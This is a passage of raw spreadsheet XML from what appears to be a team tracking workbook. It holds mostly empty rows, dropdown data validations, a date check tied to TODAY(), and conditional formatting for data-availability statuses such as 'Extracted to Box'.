      <c r="A3" s="87"/>
    </row>
    <row r="4" spans="1:5">
      <c r="A4" s="87"/>
    </row>
    <row r="5" spans="1:5">
      <c r="A5" s="87"/>
    </row>
    <row r="6" spans="1:5">
      <c r="A6" s="87"/>
    </row>
    <row r="7" spans="1:5">
      <c r="A7" s="87"/>
    </row>
    <row r="8" spans="1:5">
      <c r="A8" s="87"/>
    </row>
    <row r="9" spans="1:5">
      <c r="A9" s="87"/>
    </row>
    <row r="10" spans="1:5">
      <c r="A10" s="87"/>
    </row>
    <row r="11" spans="1:5">
      <c r="A11" s="87"/>
    </row>
    <row r="12" spans="1:5">
      <c r="A12" s="87"/>
    </row>
    <row r="13" spans="1:5">
      <c r="A13" s="87"/>
    </row>
    <row r="14" spans="1:5">
      <c r="A14" s="87"/>
    </row>
    <row r="15" spans="1:5">
      <c r="A15" s="87"/>
    </row>
    <row r="16" spans="1:5">
      <c r="A16" s="87"/>
    </row>
    <row r="17" spans="1:5">
      <c r="A17" s="87"/>
    </row>
    <row r="18" spans="1:5">
      <c r="A18" s="87"/>
    </row>
    <row r="19" spans="1:5">
      <c r="A19" s="87"/>
    </row>
    <row r="20" spans="1:5">
      <c r="A20" s="87"/>
    </row>
    <row r="21" spans="1:5">
      <c r="A21" s="87"/>
    </row>
    <row r="22" spans="1:5">
      <c r="A22" s="87"/>
    </row>
    <row r="23" spans="1:5">
      <c r="A23" s="87"/>
    </row>
    <row r="24" spans="1:5">
      <c r="A24" s="87"/>
    </row>
    <row r="25" spans="1:5">
      <c r="A25" s="87"/>
    </row>
    <row r="26" spans="1:5">
      <c r="A26" s="87"/>
    </row>
    <row r="27" spans="1:5">
      <c r="A27" s="87"/>
    </row>
    <row r="28" spans="1:5" ht="16.5" thickBot="1">
      <c r="A28" s="87"/>
    </row>
    <row r="29" spans="1:5" ht="16.5" thickBot="1">
      <c r="A29" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B29" s="9"/>
      <c r="C29" s="9"/>
      <c r="D29" s="9"/>
      <c r="E29" s="10"/>
    </row>
  </sheetData>
  <dataValidations count="2">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2:A28" xr:uid="{4A5F10D5-8A1F-43BD-8DD9-53CF440363B4}">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8" xr:uid="{50A70A5C-D072-4784-AF97-6363278B1AB4}">
      <formula1>members_NamedRange</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showInputMessage="1" showErrorMessage="1" xr:uid="{D326705A-B75B-44EE-A651-C224883BC2FF}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$78:$C$93</xm:f>
          </x14:formula1>
          <xm:sqref>C2:C28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62FF"/>
  </sheetPr>
  <dimension ref="A1:L29"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" topLeftCell="G7" activePane="topRight" state="frozen"/>
      <selection pane="topRight" activeCell="G7" sqref="G7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.09765625" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="2" width="11.8984375" customWidth="1"/>
    <col min="3" max="4" width="16.3984375" customWidth="1"/>
    <col min="5" max="5" width="24.796875" customWidth="1"/>
    <col min="6" max="6" width="16.3984375" customWidth="1"/>
    <col min="7" max="7" width="41" customWidth="1"/>
    <col min="8" max="11" width="16.3984375" customWidth="1"/>
    <col min="12" max="12" width="14.59765625" customWidth="1"/>
    <col min="13" max="13" width="16.3984375" customWidth="1"/>
    <col min="14" max="14" width="9.09765625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12">
      <c r="A1" t="s">
        <v>184</v>
      </c>
      <c r="B1" t="s">
        <v>3</v>
      </c>
      <c r="C1" t="s">
        <v>60</v>
      </c>
      <c r="D1" t="s">
        <v>71</v>
      </c>
      <c r="E1" t="s">
        <v>185</v>
      </c>
      <c r="F1" t="s">
        <v>186</v>
      </c>
      <c r="G1" t="s">
        <v>103</v>
      </c>
      <c r="H1" t="s">
        <v>187</v>
      </c>
      <c r="I1" t="s">
        <v>188</v>
      </c>
      <c r="J1" t="s">
        <v>189</v>
      </c>
      <c r="K1" t="s">
        <v>190</v>
      </c>
      <c r="L1" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="2" spans="1:12">
      <c r="A2" s="107"/>
      <c r="B2" s="87"/>
      <c r="D2" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="3" spans="1:12">
      <c r="A3" s="107"/>
      <c r="B3" s="87"/>
    </row>
    <row r="4" spans="1:12">
      <c r="A4" s="107"/>
      <c r="B4" s="87"/>
    </row>
    <row r="5" spans="1:12">
      <c r="A5" s="107"/>
      <c r="B5" s="87"/>
    </row>
    <row r="6" spans="1:12">
      <c r="A6" s="107"/>
      <c r="B6" s="87"/>
    </row>
    <row r="7" spans="1:12">
      <c r="A7" s="107"/>
      <c r="B7" s="87"/>
    </row>
    <row r="8" spans="1:12">
      <c r="A8" s="107"/>
      <c r="B8" s="87"/>
    </row>
    <row r="9" spans="1:12">
      <c r="A9" s="107"/>
      <c r="B9" s="87"/>
    </row>
    <row r="10" spans="1:12">
      <c r="A10" s="107"/>
      <c r="B10" s="87"/>
    </row>
    <row r="11" spans="1:12">
      <c r="A11" s="107"/>
      <c r="B11" s="87"/>
    </row>
    <row r="12" spans="1:12">
      <c r="A12" s="107"/>
      <c r="B12" s="87"/>
    </row>
    <row r="13" spans="1:12">
      <c r="A13" s="107"/>
      <c r="B13" s="87"/>
    </row>
    <row r="14" spans="1:12">
      <c r="A14" s="107"/>
      <c r="B14" s="87"/>
    </row>
    <row r="15" spans="1:12">
      <c r="A15" s="107"/>
      <c r="B15" s="87"/>
    </row>
    <row r="16" spans="1:12">
      <c r="A16" s="107"/>
      <c r="B16" s="87"/>
    </row>
    <row r="17" spans="1:12">
      <c r="A17" s="107"/>
      <c r="B17" s="87"/>
    </row>
    <row r="18" spans="1:12">
      <c r="A18" s="107"/>
      <c r="B18" s="87"/>
    </row>
    <row r="19" spans="1:12">
      <c r="A19" s="107"/>
      <c r="B19" s="87"/>
    </row>
    <row r="20" spans="1:12">
      <c r="A20" s="107"/>
      <c r="B20" s="87"/>
    </row>
    <row r="21" spans="1:12">
      <c r="A21" s="107"/>
      <c r="B21" s="87"/>
    </row>
    <row r="22" spans="1:12">
      <c r="A22" s="107"/>
      <c r="B22" s="87"/>
    </row>
    <row r="23" spans="1:12">
      <c r="A23" s="107"/>
      <c r="B23" s="87"/>
    </row>
    <row r="24" spans="1:12">
      <c r="A24" s="107"/>
      <c r="B24" s="87"/>
    </row>
    <row r="25" spans="1:12">
      <c r="A25" s="107"/>
      <c r="B25" s="87"/>
    </row>
    <row r="26" spans="1:12">
      <c r="A26" s="107"/>
      <c r="B26" s="87"/>
    </row>
    <row r="27" spans="1:12">
      <c r="A27" s="107"/>
      <c r="B27" s="87"/>
    </row>
    <row r="28" spans="1:12" ht="16.5" thickBot="1">
      <c r="A28" s="107"/>
      <c r="B28" s="87"/>
    </row>
    <row r="29" spans="1:12" ht="16.5" thickBot="1">
      <c r="A29" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B29" s="19"/>
      <c r="C29" s="17"/>
      <c r="D29" s="17"/>
      <c r="E29" s="17"/>
      <c r="F29" s="17"/>
      <c r="G29" s="17"/>
      <c r="H29" s="17"/>
      <c r="I29" s="17"/>
      <c r="J29" s="17"/>
      <c r="K29" s="17"/>
      <c r="L29" s="17"/>
    </row>
  </sheetData>
  <phoneticPr fontId="4" type="noConversion"/>
  <conditionalFormatting sqref="E2:E28">
    <cfRule type="cellIs" dxfId="106" priority="1" operator="equal">
      <formula>"Unknown"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="105" priority="2" operator="equal">
      <formula>"Unavailable"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="104" priority="3" operator="equal">
      <formula>"Available (not yet on Box)"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="103" priority="4" operator="equal">
      <formula>"Extracted to Box"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="2">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28" xr:uid="{703FB1FC-48B0-4D8B-A559-277634817347}">
      <formula1>members_NamedRange</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28" xr:uid="{1EA6F42C-86AE-42FB-AC56-4888B12682E8}">
      <formula1>TODAY()</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2">
        <x14:dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Data Entered" error="Please enter valid data from the drop down list" xr:uid="{4BB2A6AA-D9A9-4A80-B0AB-9FB32924E9D7}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$29:$C$32</xm:f>
          </x14:formula1>
          <xm:sqref>E2:E28</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{653C5B1D-B133-4943-A63A-31AC1D562F3B}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$26:$C$27</xm:f>
          </x14:formula1>
          <xm:sqref>D2:D28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952D5-8D90-4AAF-8007-3BF0932D2533}">
  <sheetPr>
    <tabColor rgb="FF0062FF"/>
  </sheetPr>
  <dimension ref="A1:I29"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C17" sqref="C17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.796875" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="11.69921875" customWidth="1"/>
    <col min="2" max="2" width="14.8984375" customWidth="1"/>
    <col min="3" max="3" width="24" customWidth="1"/>
    <col min="4" max="8" width="10.5" customWidth="1"/>
    <col min="9" max="9" width="18" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9">
      <c r="A1" t="s">
        <v>193</v>
      </c>
      <c r="B1" t="s">
        <v>194</v>
      </c>
      <c r="C1" t="s">
        <v>103</v>
      </c>
      <c r="D1" t="s">
        <v>61</v>
      </c>
      <c r="E1" t="s">
        <v>195</v>
      </c>
      <c r="F1" t="s">
        <v>196</v>
      </c>
      <c r="G1" t="s">
        <v>197</v>
      </c>
      <c r="H1" t="s">
        <v>198</v>
      </c>
      <c r="I1" s="94" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="2" spans="1:9">
      <c r="A2" s="87"/>
    </row>
    <row r="3" spans="1:9">
      <c r="A3" s="87"/>
    </row>
    <row r="4" spans="1:9">
      <c r="A4" s="87"/>
    </row>
    <row r="5" spans="1:9">
      <c r="A5" s="87"/>
    </row>
    <row r="6" spans="1:9">
      <c r="A6" s="87"/>
    </row>
    <row r="7" spans="1:9">
      <c r="A7" s="87"/>
    </row>
    <row r="8" spans="1:9">
      <c r="A8" s="87"/>
    </row>
    <row r="9" spans="1:9">
      <c r="A9" s="87"/>
    </row>
    <row r="10" spans="1:9">
      <c r="A10" s="87"/>
    </row>
    <row r="11" spans="1:9">
      <c r="A11" s="87"/>
    </row>
    <row r="12" spans="1:9">
      <c r="A12" s="87"/>
    </row>
    <row r="13" spans="1:9">
      <c r="A13" s="87"/>
    </row>
    <row r="14" spans="1:9">
      <c r="A14" s="87"/>
    </row>
    <row r="15" spans="1:9">
      <c r="A15" s="87"/>
    </row>
    <row r="16" spans="1:9">
      <c r="A16" s="87"/>
    </row>
    <row r="17" spans="1:9">
      <c r="A17" s="87"/>
    </row>
    <row r="18" spans="1:9">
      <c r="A18" s="87"/>
    </row>
    <row r="19" spans="1:9">
      <c r="A19" s="87"/>
    </row>
    <row r="20" spans="1:9">
      <c r="A20" s="87"/>
    </row>
    <row r="21" spans="1:9">
      <c r="A21" s="87"/>
    </row>
    <row r="22" spans="1:9">
      <c r="A22" s="87"/>
    </row>
    <row r="23" spans="1:9">
      <c r="A23" s="87"/>
    </row>
    <row r="24" spans="1:9">
      <c r="A24" s="87"/>
    </row>
    <row r="25" spans="1:9">
      <c r="A25" s="87"/>
    </row>
    <row r="26" spans="1:9">
      <c r="A26" s="87"/>
    </row>
    <row r="27" spans="1:9">
      <c r="A27" s="87"/>
    </row>
    <row r="28" spans="1:9" ht="16.5" thickBot="1">
      <c r="A28" s="87"/>
    </row>
    <row r="29" spans="1:9" ht="16.5" thickBot="1">
      <c r="A29" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B29" s="9"/>
      <c r="C29" s="9"/>
      <c r="D29" s="9"/>
      <c r="E29" s="9"/>
      <c r="F29" s="9"/>
      <c r="G29" s="9"/>
      <c r="H29" s="9"/>
      <c r="I29" s="9"/>
    </row>
  </sheetData>
  <phoneticPr fontId="15" type="noConversion"/>
  <dataValidations count="2">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8" xr:uid="{35F42785-B63F-490A-9A45-FCB31E4CAEED}">
      <formula1>members_NamedRange</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2:A28" xr:uid="{B2A10024-1896-4EBB-9C84-89DF6B76F428}">
      <formula1>TODAY()</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showInputMessage="1" showErrorMessage="1" xr:uid="{E03F57DC-BC98-4396-B784-D5A2A3ECB092}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$78:$C$93</xm:f>
          </x14:formula1>
          <xm:sqref>C2:C28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BD718-0B6B-4460-96B5-9F27A8474900}">
  <sheetPr>
    <tabColor rgb="FF0062FF"/>
  </sheetPr>
  <dimension ref="A1:D17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="12.8984375" style="1" customWidth="1"/>
    <col min="2" max="2" width="12.19921875" customWidth="1"/>
    <col min="3" max="4" width="58.3984375" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="26.19921875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4">
      <c r="A1" s="121" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="77" t="s">
        <v>70</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>200</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:4">
      <c r="A2" s="122"/>
      <c r="B2" s="95"/>
      <c r="C2" s="21" t="s">
        <v>201</v>
      </c>
      <c r="D2" s="16"/>
    </row>
    <row r="3" spans="1:4">
      <c r="A3" s="122"/>
      <c r="B3" s="95"/>
      <c r="C3" s="21"/>
      <c r="D3" s="16"/>
    </row>
    <row r="4" spans="1:4">
      <c r="A4" s="122"/>
      <c r="B4" s="95"/>
      <c r="C4" s="21"/>
      <c r="D4" s="16"/>
    </row>
    <row r="5" spans="1:4">
      <c r="A5" s="124"/>
      <c r="B5" s="95"/>
      <c r="C5" s="21"/>
      <c r="D5" s="16"/>
    </row>
    <row r="6" spans="1:4">
      <c r="A6" s="122"/>
      <c r="B6" s="95"/>
      <c r="C6" s="21"/>
      <c r="D6" s="16"/>
    </row>
    <row r="7" spans="1:4">
      <c r="A7" s="122"/>
      <c r="B7" s="95"/>
      <c r="C7" s="21"/>
      <c r="D7" s="16"/>
    </row>
    <row r="8" spans="1:4">
      <c r="A8" s="125"/>
      <c r="B8" s="95"/>
      <c r="C8" s="21"/>
      <c r="D8" s="16"/>
    </row>
    <row r="9" spans="1:4">
      <c r="A9" s="122"/>
      <c r="B9" s="95"/>
      <c r="C9" s="21"/>
      <c r="D9" s="16"/>
    </row>
    <row r="10" spans="1:4">
      <c r="A10" s="122"/>
      <c r="B10" s="95"/>
      <c r="C10" s="21"/>
      <c r="D10" s="16"/>
    </row>
    <row r="11" spans="1:4">
      <c r="A11" s="122"/>
      <c r="B11" s="95"/>
      <c r="C11" s="21"/>
      <c r="D11" s="16"/>
    </row>
    <row r="12" spans="1:4">
      <c r="A12" s="122"/>
      <c r="B12" s="95"/>
      <c r="C12" s="21"/>
      <c r="D12" s="16"/>
    </row>
    <row r="13" spans="1:4">
      <c r="A13" s="122"/>
      <c r="B13" s="95"/>
      <c r="C13" s="21"/>
      <c r="D13" s="16"/>
    </row>
    <row r="14" spans="1:4">
      <c r="A14" s="122"/>
      <c r="B14" s="95"/>
      <c r="C14" s="21"/>
      <c r="D14" s="16"/>
    </row>
    <row r="15" spans="1:4">
      <c r="A15" s="122"/>
      <c r="B15" s="95"/>
      <c r="C15" s="21"/>
      <c r="D15" s="16"/>
    </row>
    <row r="16" spans="1:4" ht="16.5" thickBot="1">
      <c r="A16" s="122"/>
      <c r="B16" s="95"/>
      <c r="C16" s="21"/>
      <c r="D16" s="16"/>
    </row>
    <row r="17" spans="1:4" ht="16.5" thickBot="1">
      <c r="A17" s="123" t="s">
        <v>23</v>
      </c>
      <c r="B17" s="78"/>
      <c r="C17" s="22"/>
      <c r="D17" s="20"/>
    </row>
  </sheetData>
  <dataValidations count="3">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16" xr:uid="{6003F81D-A801-45BC-8A62-221D7390404B}">
      <formula1>members_NamedRange</formula1>
    </dataValidation>
    <dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Date Entered" error="Date added does not match current date. If for whatever reason the date added needs to reflect an earlier or later date, please enter the value into another cell, and then paste it into the value." sqref="A2:A4 A6:A16" xr:uid="{64202372-ED94-4648-9414-FC4E1C5A9A88}">
      <formula1>TODAY()</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5" xr:uid="{13906F60-BBCF-43EB-9D36-DAA5A6AD29E2}">
      <formula1>TODAY()</formula1>
    </dataValidation>
  </dataValidation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1E6DB-5598-4D99-895A-C0FA65F7F3B7}">
  <sheetPr>
    <tabColor rgb="FF0062FF"/>
  </sheetPr>
  <dimension ref="A1:L25"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="C20" sqref="C20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="11.19921875" customWidth="1"/>
    <col min="2" max="2" width="11.09765625" customWidth="1"/>
    <col min="3" max="3" width="82" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="8.09765625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="7.3984375" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="13.59765625" customWidth="1"/>
    <col min="8" max="8" width="12.5" customWidth="1"/>
    <col min="9" max="9" width="16.5" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="14.69921875" customWidth="1"/>
    <col min="11" max="11" width="12.59765625" customWidth="1"/>
    <col min="12" max="12" width="72.09765625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12">
      <c r="A1" s="82" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="83" t="s">
        <v>70</v>
      </c>
      <c r="C1" s="79" t="s">
        <v>202</v>
      </c>
      <c r="D1" s="80" t="s">
        <v>203</v>
      </c>
      <c r="E1" s="80" t="s">
        <v>62</v>
      </c>
      <c r="F1" s="80" t="s">
        <v>61</v>
      </c>
      <c r="G1" s="80" t="s">
        <v>204</v>
      </c>
      <c r="H1" s="80" t="s">
        <v>205</v>
      </c>
      <c r="I1" s="80" t="s">
        <v>206</v>
      </c>
      <c r="J1" s="80" t="s">
        <v>207</v>
      </c>
      <c r="K1" s="81" t="s">
        <v>4</v>
      </c>
      <c r="L1" s="80" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:12">
      <c r="A2" s="96">
        <v>44582</v>
      </c>
      <c r="B2" s="85" t="s">
        <v>22</v>
      </c>
      <c r="C2" s="23" t="s">
        <v>208</v>
      </c>
      <c r="D2" s="23"/>
      <c r="E2" s="23" t="s">
        <v>209</v>
      </c>
      <c r="F2" s="23" t="s">
        <v>210</v>
      </c>
      <c r="G2" s="23" t="s">
        <v>211</v>
      </c>
      <c r="H2" s="23" t="s">
        <v>212</v>
      </c>
      <c r="I2" s="23" t="s">
        <v>213</v>
      </c>
      <c r="J2" s="24"/>
      <c r="K2" s="97"/>
      <c r="L2" s="23"/>
    </row>
    <row r="3" spans="1:12">
      <c r="A3" s="96">
        <v>44583</v>
      </c>
      <c r="B3" s="85" t="s">
        <v>21</v>
      </c>
      <c r="C3" s="23" t="s">
        <v>214</v>
      </c>
      <c r="D3" s="23"/>
      <c r="E3" s="23" t="s">
        <v>209</v>
      </c>
      <c r="F3" s="23" t="s">
        <v>210</v>
      </c>
      <c r="G3" s="23" t="s">
        <v>211</v>
      </c>
      <c r="H3" s="23" t="s">
        <v>215</v>
      </c>
      <c r="I3" s="23" t="s">
        <v>216</v>
      </c>
      <c r="J3" s="24"/>
      <c r="K3" s="97"/>
      <c r="L3" s="23"/>
    </row>
    <row r="4" spans="1:12">
      <c r="A4" s="96">
        <v>44584</v>
      </c>
      <c r="B4" s="85" t="s">
        <v>21</v>
      </c>
      <c r="C4" s="23" t="s">
        <v>217</v>
      </c>
      <c r="D4" s="23"/>
      <c r="E4" s="23" t="s">
        <v>209</v>
      </c>
      <c r="F4" s="23" t="s">
        <v>210</v>
      </c>
      <c r="G4" s="23" t="s">
        <v>218</v>
      </c>
      <c r="H4" s="23" t="s">
        <v>212</v>
      </c>
      <c r="I4" s="23" t="s">
        <v>216</v>
      </c>
      <c r="J4" s="24"/>
      <c r="K4" s="97"/>
      <c r="L4" s="23"/>
    </row>
    <row r="5" spans="1:12">
      <c r="A5" s="96"/>
      <c r="B5" s="85"/>
      <c r="C5" s="23"/>
      <c r="D5" s="23"/>
      <c r="E5" s="23"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="24"/>
      <c r="K5" s="97"/>
      <c r="L5" s="23"/>
    </row>
    <row r="6" spans="1:12">
      <c r="A6" s="96"/>
      <c r="B6" s="85"/>
      <c r="C6" s="23"/>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23"/>
      <c r="J6" s="24"/>
      <c r="K6" s="97"/>
      <c r="L6" s="25"/>
    </row>
    <row r="7" spans="1:12">
      <c r="A7" s="96"/>
      <c r="B7" s="85"/>
      <c r="C7" s="23"/>
      <c r="D7" s="23"/>
      <c r="E7" s="23"/>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="24"/>
      <c r="K7" s="97"/>
      <c r="L7" s="23"/>
    </row>
    <row r="8" spans="1:12">
      <c r="A8" s="96"/>
      <c r="B8" s="85"/>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="24"/>
      <c r="K8" s="97"/>
      <c r="L8" s="23"/>
    </row>
    <row r="9" spans="1:12">
      <c r="A9" s="96"/>
      <c r="B9" s="85"/>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="24"/>
      <c r="K9" s="97"/>
      <c r="L9" s="23"/>
    </row>
    <row r="10" spans="1:12">
      <c r="A10" s="96"/>
      <c r="B10" s="85"/>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="24"/>
      <c r="K10" s="97"/>
      <c r="L10" s="23"/>
    </row>
    <row r="11" spans="1:12">
      <c r="A11" s="96"/>
      <c r="B11" s="85"/>
      <c r="C11" s="23"/>
      <c r="D11" s="23"/>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="24"/>
      <c r="K11" s="97"/>
      <c r="L11" s="23"/>
    </row>
    <row r="12" spans="1:12">
      <c r="A12" s="96"/>
      <c r="B12" s="85"/>
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="24"/>
      <c r="K12" s="97"/>
      <c r="L12" s="23"/>
    </row>
    <row r="13" spans="1:12">
      <c r="A13" s="96"/>
      <c r="B13" s="85"/>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="24"/>
      <c r="K13" s="97"/>
      <c r="L13" s="23"/>
    </row>
    <row r="14" spans="1:12">
      <c r="A14" s="96"/>
      <c r="B14" s="85"/>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="24"/>
      <c r="K14" s="97"/>
      <c r="L14" s="23"/>
    </row>
    <row r="15" spans="1:12">
      <c r="A15" s="96"/>
      <c r="B15" s="85"/>
      <c r="C15" s="23"/>
      <c r="D15" s="23"/>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="24"/>
      <c r="K15" s="97"/>
      <c r="L15" s="23"/>
    </row>
    <row r="16" spans="1:12">
      <c r="A16" s="96"/>
      <c r="B16" s="85"/>
      <c r="C16" s="23"/>
      <c r="D16" s="23"/>
      <c r="E16" s="23"/>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="23"/>
      <c r="I16" s="23"/>
      <c r="J16" s="24"/>
      <c r="K16" s="97"/>
      <c r="L16" s="23"/>
    </row>
    <row r="17" spans="1:12">
      <c r="A17" s="96"/>
      <c r="B17" s="85"/>
      <c r="C17" s="23"/>
      <c r="D17" s="23"/>
      <c r="E17" s="23"/>
      <c r="F17" s="23"/>
      <c r="G17" s="23"/>
      <c r="H17" s="23"/>
      <c r="I17" s="23"/>
      <c r="J17" s="24"/>
      <c r="K17" s="97"/>
      <c r="L17" s="23"/>
    </row>
    <row r="18" spans="1:12">
      <c r="A18" s="96"/>
      <c r="B18" s="85"/>
      <c r="C18" s="23"/>
      <c r="D18" s="23"/>
      <c r="E18" s="23"/>
      <c r="F18" s="23"/>
      <c r="G18" s="23"/>
      <c r="H18" s="23"/>
      <c r="I18" s="23"/>
      <c r="J18" s="24"/>
      <c r="K18" s="97"/>
      <c r="L18" s="23"/>
    </row>
    <row r="19" spans="1:12">
      <c r="A19" s="96"/>
      <c r="B19" s="85"/>
      <c r="C19" s="23"/>
      <c r="D19" s="23"/>
      <c r="E19" s="23"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="23"/>
      <c r="I19" s="23"/>
      <c r="J19" s="24"/>
      <c r="K19" s="97"/>
      <c r="L19" s="23"/>
    </row>
    <row r="20" spans="1:12">
      <c r="A20" s="96"/>
      <c r="B20" s="85"/>
      <c r="C20" s="23"/>
      <c r="D20" s="23"/>
      <c r="E20" s="23"/>
      <c r="F20" s="23"/>
      <c r="G20" s="23"/>
      <c r="H20" s="23"/>
      <c r="I20" s="23"/>
      <c r="J20" s="23"/>
      <c r="K20" s="97"/>
      <c r="L20" s="23"/>
    </row>
    <row r="21" spans="1:12">
      <c r="A21" s="96"/>
      <c r="B21" s="85"/>
      <c r="C21" s="23"/>
      <c r="D21" s="23"/>
      <c r="E21" s="23"/>
      <c r="F21" s="23"/>
      <c r="G21" s="23"/>
      <c r="H21" s="23"/>
      <c r="I21" s="23"/>
      <c r="J21" s="23"/>
      <c r="K21" s="97"/>
      <c r="L21" s="23"/>
    </row>
    <row r="22" spans="1:12">
      <c r="A22" s="96"/>
      <c r="B22" s="85"/>
      <c r="C22" s="23"/>
      <c r="D22" s="23"/>
      <c r="E22" s="23"/>
      <c r="F22" s="23"/>
      <c r="G22" s="23"/>
      <c r="H22" s="23"/>
      <c r="I22" s="23"/>
      <c r="J22" s="23"/>
      <c r="K22" s="97"/>
      <c r="L22" s="23"/>
    </row>
    <row r="23" spans="1:12">
      <c r="A23" s="96"/>
      <c r="B23" s="85"/>
      <c r="C23" s="23"/>
      <c r="D23" s="23"/>
      <c r="E23" s="23"/>
      <c r="F23" s="23"/>
      <c r="G23" s="23"/>
      <c r="H23" s="23"/>
      <c r="I23" s="23"/>
      <c r="J23" s="23"/>
      <c r="K23" s="97"/>
      <c r="L23" s="23"/>
    </row>
    <row r="24" spans="1:12">
      <c r="A24" s="96"/>
      <c r="B24" s="85"/>
      <c r="C24" s="23"/>
      <c r="D24" s="23"/>
      <c r="E24" s="23"/>
      <c r="F24" s="23"/>
      <c r="G24" s="23"/>
      <c r="H24" s="23"/>
      <c r="I24" s="23"/>
      <c r="J24" s="23"/>
      <c r="K24" s="97"/>
      <c r="L24" s="23"/>
    </row>
    <row r="25" spans="1:12">
      <c r="A25" s="84" t="s">
        <v>23</v>
      </c>
      <c r="B25" s="84"/>
      <c r="C25" s="26"/>
      <c r="D25" s="26"/>
      <c r="E25" s="26"/>
      <c r="F25" s="26"/>
      <c r="G25" s="26"/>
      <c r="H25" s="26"/>
      <c r="I25" s="26"/>
      <c r="J25" s="26"/>
      <c r="K25" s="27"/>
      <c r="L25" s="28"/>
    </row>
  </sheetData>
  <phoneticPr fontId="15" type="noConversion"/>
  <conditionalFormatting sqref="A25">
    <cfRule type="duplicateValues" dxfId="62" priority="8"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="A2:B24">
    <cfRule type="containsBlanks" dxfId="61" priority="5">
      <formula>LEN(TRIM(A2))=0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G2:G24">
    <cfRule type="cellIs" dxfId="60" priority="1" operator="equal">
